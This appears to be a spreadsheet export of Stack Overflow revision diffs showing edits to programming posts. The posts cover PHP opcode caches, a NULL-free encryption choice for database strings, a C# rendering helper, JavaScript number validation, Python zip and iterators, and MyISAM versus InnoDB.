 &lt;p&gt; And: You DO want to install a opcode cache!&lt;/p&gt; _x000D_
 &lt;p&gt; For example: &lt;img class="diff-delete" src="https://i.stack.imgur.com/06Aj9.png" alt="alt text"&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; This is the duration it took to call the wordpress homepage 10.000 times.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;Edit:&lt;/em&gt; BTW, eAccelerator contains an optimizer itself.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Note that Zend Optimizer and MMCache (or similar applications) are totally different things. While Zend Optimizer tries to optimize the program opcode MMCache will cache the scripts in memory and reuse the precompiled code.&lt;/p&gt; _x000D_
 &lt;p&gt; I did some benchmarks some time ago and you can find the &lt;a href="http://blogs.interdose.com/dominik/2008/04/11/benchmarking-php-eaccelerator-und-andere-opcode-caches/" rel="nofollow noreferrer"&gt;results&lt;/a&gt; in my blog (in German though). The basic results:&lt;/p&gt; _x000D_
 &lt;p&gt; Zend Optimizer alone didn't help at all. Actually my scripts were slower than without optimizer.&lt;/p&gt; _x000D_
 &lt;p&gt; When it comes to caches:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; fastest: &lt;a href="http://eaccelerator.net/" rel="nofollow noreferrer"&gt;eAccelerator&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://xcache.lighttpd.net/" rel="nofollow noreferrer"&gt;XCache&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.php.net/manual/en/book.apc.php" rel="nofollow noreferrer"&gt;APC&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; And: You DO want to install a opcode cache!&lt;/p&gt; _x000D_
 &lt;p&gt; For example: &lt;a href="http://blogs.interdose.com/dominik/wp-content/uploads/2008/04/opcode_wordpress.png" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;alt text http://blogs.interdose.com/dominik/wp-content/uploads/2008/04/opcode_wordpress.png&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; This is the duration it took to call the wordpress homepage 10.000 times.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;Edit:&lt;/em&gt; BTW, eAccelerator contains an optimizer itself.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>BlaM</t>
  </si>
  <si>
    <t>Neysor</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We have a situation in our product where for a long time some data has been stored in the application's database as SQL string (choice of MS SQL server or sybase SQL anywhere) which was encrypted via the Windows API function &lt;a href="http://msdn.microsoft.com/en-us/library/aa379924.aspx" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;CryptEncrypt.&lt;/span&gt;&lt;/a&gt; (direct and decryptable)&lt;/p&gt; _x000D_
 &lt;p&gt; The problem is that CryptEncrypt can produce NULL's in the output, meaning that when it's stored in the database, the string manipulations will at some point truncate the ciphertext.&lt;/p&gt; _x000D_
 &lt;p&gt; Ideally we'd like to use an algo that will produce cyphertext that doesn't contain NULLs as that will cause the least amount of change to the existing databases (changing a column from string to binary and code to deal with binary instead of strings) and just decrypt existing data and re-encrypt with the new algo at database upgrade time.&lt;/p&gt; _x000D_
 &lt;p&gt; The algorithm doesn't need to be the most secure, as the database is already in a reasonably secure environment (not an open network / teh interwebs) but does need to bebetter than ROT13 (which I can almost decrypt in my head now!)&lt;/p&gt; _x000D_
 &lt;p&gt; Cheers&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We have a situation in our product where for a long time some data has been stored in the application's database as SQL string (choice of MS SQL server or sybase SQL anywhere) which was encrypted via the Windows API function &lt;span class="diff-add"&gt;[CryptEncrypt.][1]&lt;/span&gt; (direct and decryptable)&lt;/p&gt; _x000D_
 &lt;p&gt; The problem is that CryptEncrypt can produce NULL's in the output, meaning that when it's stored in the database, the string manipulations will at some point truncate the ciphertext.&lt;/p&gt; _x000D_
 &lt;p&gt; Ideally we'd like to use an algo that will produce cyphertext that doesn't contain NULLs as that will cause the least amount of change to the existing databases (changing a column from string to binary and code to deal with binary instead of strings) and just decrypt existing data and re-encrypt with the new algo at database upgrade time.&lt;/p&gt; _x000D_
 &lt;p&gt; The algorithm doesn't need to be the most secure, as the database is already in a reasonably secure environment (not an open network / teh interwebs) but does need to bebetter than ROT13 (which I can almost decrypt in my head now!)&lt;/p&gt; _x000D_
 &lt;p&gt; Cheers&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; edit: btw, any particular reason for changing ciphertext to cyphertext? ciphertext seems more widely used... [1]: &lt;/span&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/aa379924.aspx" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://msdn.microsoft.com/en-us/library/aa379924.aspx&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>geocoin</t>
  </si>
  <si>
    <t>user2189331</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here's another extension method that I use for custom rendering:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public static void WriteControls (this HtmlTextWriter o, &lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;string format, params object[] args)&lt;span class="diff-delete"&gt; { &lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;   const string delimiter = "&amp;lt;2E01A260-BD39-47d0-8C5E-0DF814FDF9DC&amp;gt;";_x000D_
    var controls  = new Dictionary&amp;lt;string,Control&amp;gt;();_x000D_
 _x000D_
    for(int i =0; i &amp;lt; args.Length; ++i)&lt;span class="diff-delete"&gt; {&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;      var c = args[i] as Control; _x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;       if (c==null) continue;_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;       var guid = Guid.NewGuid().ToString();_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;       controls[guid] = c;_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;       args[i] = delimiter+guid+delimiter;_x000D_
    }_x000D_
  _x000D_
    var _strings_x000D_
       = string.Format(format, args).Split( new string[]{delimiter}_x000D_
                                           ,StringSplitOptions.None);_x000D_
    foreach(var s in _strings)&lt;span class="diff-delete"&gt; {&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;      if (controls.ContainsKey(s)) controls[s].RenderControl(o);_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;       else o.Write(s);_x000D_
     }_x000D_
 }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Then, to render a custom composite in the RenderContents() method I write this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;protected override void RenderContents(HtmlTextWriter o)&lt;span class="diff-delete"&gt; {&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;   o.WriteControls_x000D_
    (@"&amp;lt;table&amp;gt;_x000D_
        &amp;lt;tr&amp;gt;_x000D_
            &amp;lt;td&amp;gt;{0}&amp;lt;/td&amp;gt;_x000D_
            &amp;lt;td&amp;gt;&amp;lt;{1}&amp;gt;&amp;lt;/td&amp;gt;_x000D_
        &amp;lt;/tr&amp;gt;_x000D_
    &amp;lt;/table&amp;gt;"_x000D_
    ,Text_x000D_
    ,control1_x000D_
    );_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here's another extension method that I use for custom rendering:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;  &lt;/span&gt;public static void WriteControls&lt;span class="diff-add"&gt;_x000D_
       &lt;/span&gt; (this HtmlTextWriter o, string format, params object[] args)_x000D_
  &lt;span class="diff-add"&gt;{&lt;/span&gt; const string delimiter = "&amp;lt;2E01A260-BD39-47d0-8C5E-0DF814FDF9DC&amp;gt;";_x000D_
    var controls  = new Dictionary&amp;lt;string,Control&amp;gt;();_x000D_
 _x000D_
    for(int i =0; i &amp;lt; args.Length; ++i)_x000D_
     &lt;span class="diff-add"&gt;{&lt;/span&gt; var c = args[i] as Control; _x000D_
       if (c==null) continue;_x000D_
       var guid = Guid.NewGuid().ToString();_x000D_
       controls[guid] = c;_x000D_
       args[i] = delimiter+guid+delimiter;_x000D_
&lt;span class="diff-add"&gt; &lt;/span&gt;    }_x000D_
  _x000D_
    var _strings_x000D_
       = string.Format(format, args).Split( new string[]{delimiter}_x000D_
                                           ,StringSplitOptions.None);_x000D_
    foreach(var s in _strings)_x000D_
     &lt;span class="diff-add"&gt;{&lt;/span&gt; if (controls.ContainsKey(s)) controls[s].RenderControl(o);_x000D_
       else o.Write(s);_x000D_
     }_x000D_
&lt;span class="diff-add"&gt; &lt;/span&gt; }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Then, to render a custom composite in the RenderContents() method I write this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;protected override void RenderContents(HtmlTextWriter o)_x000D_
  &lt;span class="diff-add"&gt;{&lt;/span&gt; o.WriteControls_x000D_
&lt;span class="diff-add"&gt;     &lt;/span&gt;    (@"&amp;lt;table&amp;gt;_x000D_
&lt;span class="diff-add"&gt;       &lt;/span&gt;        &amp;lt;tr&amp;gt;_x000D_
&lt;span class="diff-add"&gt;        &lt;/span&gt;            &amp;lt;td&amp;gt;{0}&amp;lt;/td&amp;gt;_x000D_
&lt;span class="diff-add"&gt;        &lt;/span&gt;            &amp;lt;td&amp;gt;&amp;lt;{1}&amp;gt;&amp;lt;/td&amp;gt;_x000D_
&lt;span class="diff-add"&gt;       &lt;/span&gt;        &amp;lt;/tr&amp;gt;_x000D_
&lt;span class="diff-add"&gt;         &lt;/span&gt;    &amp;lt;/table&amp;gt;"_x000D_
&lt;span class="diff-add"&gt;        &lt;/span&gt;    ,Text_x000D_
&lt;span class="diff-add"&gt;        &lt;/span&gt;    ,control1_x000D_
&lt;span class="diff-add"&gt;       &lt;/span&gt;    );_x000D_
&lt;span class="diff-add"&gt;  &lt;/span&gt;}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Mark Cidade</t>
  </si>
  <si>
    <t>Manoj Sharma</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What's the cleanest, most effective way to validate decimal numbers in javascript?&lt;/p&gt; _x000D_
 &lt;p&gt; Bonus points for:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; Clarity--solution should be clean and simple&lt;/li&gt; _x000D_
  &lt;li&gt; Cross-platform&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; Test cases:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;IsNumeric('-1')&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;=&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;true&lt;/span&gt;&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;IsNumeric('-1.5')&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;=&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;true&lt;/span&gt;&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;IsNumeric('0')&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;=&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;true&lt;/span&gt;&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;IsNumeric('0.42')&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;=&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;true&lt;/span&gt;&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;Isnumeric('.42')&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;=&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;true&lt;/span&gt;&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;IsNUmeric('99,999')&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;=&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;em&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;false&lt;/span&gt;&lt;/code&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;IsNumeric('0x89f')&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;=&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;em&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;false&lt;/span&gt;&lt;/code&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;IsNumeric('#abcdef')&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;=&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;em&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;false&lt;/span&gt;&lt;/code&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;IsNumeric('1.2.3')&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;=&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;em&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;false&lt;/span&gt;&lt;/code&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;IsNumeric('')&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;=&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;em&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;false&lt;/span&gt;&lt;/code&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;IsNumeric('blah')&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;=&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;em&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;false&lt;/span&gt;&lt;/code&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/ol&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What's the cleanest, most effective way to validate decimal numbers in javascript?&lt;/p&gt; _x000D_
 &lt;p&gt; Bonus points for:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; Clarity--solution should be clean and simple&lt;/li&gt; _x000D_
  &lt;li&gt; Cross-platform&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; Test cases:&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="diff-add"&gt; &lt;span class="hljs-number"&gt;1.&lt;/span&gt; IsNumeric(&lt;span class="hljs-string"&gt;'-1'&lt;/span&gt;) =&amp;gt; &lt;span class="hljs-literal"&gt;true&lt;/span&gt;_x000D_
 &lt;span class="hljs-number"&gt;2.&lt;/span&gt; IsNumeric(&lt;span class="hljs-string"&gt;'-1.5'&lt;/span&gt;) =&amp;gt; &lt;span class="hljs-literal"&gt;true&lt;/span&gt;_x000D_
 &lt;span class="hljs-number"&gt;3.&lt;/span&gt; IsNumeric(&lt;span class="hljs-string"&gt;'0'&lt;/span&gt;) =&amp;gt; &lt;span class="hljs-literal"&gt;true&lt;/span&gt;_x000D_
 &lt;span class="hljs-number"&gt;4.&lt;/span&gt; IsNumeric(&lt;span class="hljs-string"&gt;'0.42'&lt;/span&gt;) =&amp;gt; &lt;span class="hljs-literal"&gt;true&lt;/span&gt;_x000D_
 &lt;span class="hljs-number"&gt;5.&lt;/span&gt; Isnumeric(&lt;span class="hljs-string"&gt;'.42'&lt;/span&gt;) =&amp;gt; &lt;span class="hljs-literal"&gt;true&lt;/span&gt;_x000D_
 &lt;span class="hljs-number"&gt;6.&lt;/span&gt; IsNUmeric(&lt;span class="hljs-string"&gt;'99,999'&lt;/span&gt;) =&amp;gt; *&lt;span class="hljs-literal"&gt;false&lt;/span&gt;*_x000D_
 &lt;span class="hljs-number"&gt;7.&lt;/span&gt; IsNumeric(&lt;span class="hljs-string"&gt;'0x89f'&lt;/span&gt;) =&amp;gt; *&lt;span class="hljs-literal"&gt;false&lt;/span&gt;*_x000D_
 &lt;span class="hljs-number"&gt;8.&lt;/span&gt; IsNumeric(&lt;span class="hljs-string"&gt;'#abcdef'&lt;/span&gt;)=&amp;gt; *&lt;span class="hljs-literal"&gt;false&lt;/span&gt;*_x000D_
 &lt;span class="hljs-number"&gt;9.&lt;/span&gt; IsNumeric(&lt;span class="hljs-string"&gt;'1.2.3'&lt;/span&gt;) =&amp;gt; *&lt;span class="hljs-literal"&gt;false&lt;/span&gt;*_x000D_
 &lt;span class="hljs-number"&gt;10.&lt;/span&gt; IsNumeric(&lt;span class="hljs-string"&gt;''&lt;/span&gt;) =&amp;gt; *&lt;span class="hljs-literal"&gt;false&lt;/span&gt;*_x000D_
 &lt;span class="hljs-number"&gt;11.&lt;/span&gt; IsNumeric(&lt;span class="hljs-string"&gt;'blah'&lt;/span&gt;) =&amp;gt; *&lt;span class="hljs-literal"&gt;false&lt;/span&gt;*_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Michael Haren</t>
  </si>
  <si>
    <t>bdukes</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://groups.google.com/group/chennai-flex-user-group/browse_thread/thread/cffb9ab56450c28e" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Does this help you in any ways.&lt;/span&gt;..&lt;span class="diff-delete"&gt;?&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Does the following help?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;a href="http://groups.google.com/group/chennai-flex-user-group/browse_thread/thread/cffb9ab56450c28e" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://groups&lt;/span&gt;.&lt;span class="diff-add"&gt;google&lt;/span&gt;.&lt;span class="diff-add"&gt;com/group/chennai-flex-user-group/browse_thread/thread/cffb9ab56450c28e&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>NoNaMe</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How would one create an &lt;span class="diff-delete"&gt;iterable&lt;/span&gt; function &lt;span class="diff-delete"&gt;or class&lt;/span&gt; in &lt;span class="diff-delete"&gt;Python&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How would one create an &lt;span class="diff-add"&gt;iterative&lt;/span&gt; function &lt;span class="diff-add"&gt;(or iterator object)&lt;/span&gt; in &lt;span class="diff-add"&gt;python&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>user2357112 supports Monica</t>
  </si>
  <si>
    <t>Colonel Panic</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://docs.python.org/library/functions.html#zip" rel="nofollow noreferrer"&gt;&lt;code&gt;zip&lt;/code&gt;&lt;/a&gt; is&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;nearly&lt;/span&gt;&lt;/em&gt; its own inverse! Provided you use the special * operator.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; zip(*[('a', 1), ('b', 2), ('c', 3), ('d', 4)])_x000D_
[('a', 'b', 'c', 'd'), (1, 2, 3, 4)]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The way this works is by calling &lt;code&gt;zip&lt;/code&gt; with the arguments:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;zip(('a', 1), ('b', 2), ('c', 3), ('d', 4))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; â€¦ except the arguments are passed to &lt;code&gt;zip&lt;/code&gt; directly (after being converted to a tuple), so there's no need to worry about the number of arguments getting too big&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; An &lt;/span&gt;&lt;a href="https://en.wikipedia.org/wiki/Involution_%28mathematics%29" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;involution&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; is a function that is its own inverse&lt;/span&gt;.&lt;span class="diff-delete"&gt; Due to the unpacking operator &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;*&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;, &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;zip&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; is not an involution, but we can define an involution using &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;zip&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;, as follows:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;def f(x):_x000D_
    return list(zip(*x))_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; The function &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;f&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; is an involution:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;x = [(1, 2, 3), (4, 5, 6)]_x000D_
y = f(x)_x000D_
assert y == [(1, 4), (2, 5), (3, 6)]_x000D_
x_ = f(y)_x000D_
assert x_ == x_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://docs.python.org/library/functions.html#zip" rel="nofollow noreferrer"&gt;&lt;code&gt;zip&lt;/code&gt;&lt;/a&gt; is its own inverse! Provided you use the special * operator.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; zip(*[('a', 1), ('b', 2), ('c', 3), ('d', 4)])_x000D_
[('a', 'b', 'c', 'd'), (1, 2, 3, 4)]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The way this works is by calling &lt;code&gt;zip&lt;/code&gt; with the arguments:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;zip(('a', 1), ('b', 2), ('c', 3), ('d', 4))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; â€¦ except the arguments are passed to &lt;code&gt;zip&lt;/code&gt; directly (after being converted to a tuple), so there's no need to worry about the number of arguments getting too big.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Patrick</t>
  </si>
  <si>
    <t>Ioannis Filippidis</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm working on a projects which involves a lot of database writes, I'd say (&lt;em&gt;70% inserts and 30% reads&lt;/em&gt;). This ratio would also include updates which I consider to be one read and one write. The reads can be dirty (e.g. I don't need 100% accurate information at the time of read).&lt;br&gt; The task in question will be doing over 1 million database transactions an hour.&lt;/p&gt; _x000D_
 &lt;p&gt; I've read a bunch of stuff on the web about the differences between &lt;code&gt;&lt;span class="diff-delete"&gt;MyISAM&lt;/span&gt;&lt;/code&gt; and &lt;code&gt;&lt;span class="diff-delete"&gt;InnoDB&lt;/span&gt;&lt;/code&gt;, and &lt;code&gt;&lt;span class="diff-delete"&gt;MyISAM&lt;/span&gt;&lt;/code&gt; seems like the obvious choice to me for the particular database/tables that I'll be using for this task. From what I seem to be reading, &lt;code&gt;&lt;span class="diff-delete"&gt;InnoDB&lt;/span&gt;&lt;/code&gt; is good if transactions are needed since row level locking is supported.&lt;/p&gt; _x000D_
 &lt;p&gt; Does anybody have any experience with this type of load (or higher)? Is &lt;code&gt;&lt;span class="diff-delete"&gt;MyISAM&lt;/span&gt;&lt;/code&gt; the way to go?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm working on a projects which involves a lot of database writes, I'd say (&lt;em&gt;70% inserts and 30% reads&lt;/em&gt;). This ratio would also include updates which I consider to be one read and one write. The reads can be dirty (e.g. I don't need 100% accurate information at the time of read).&lt;br&gt; The task in question will be doing over 1 million database transactions an hour.&lt;/p&gt; _x000D_
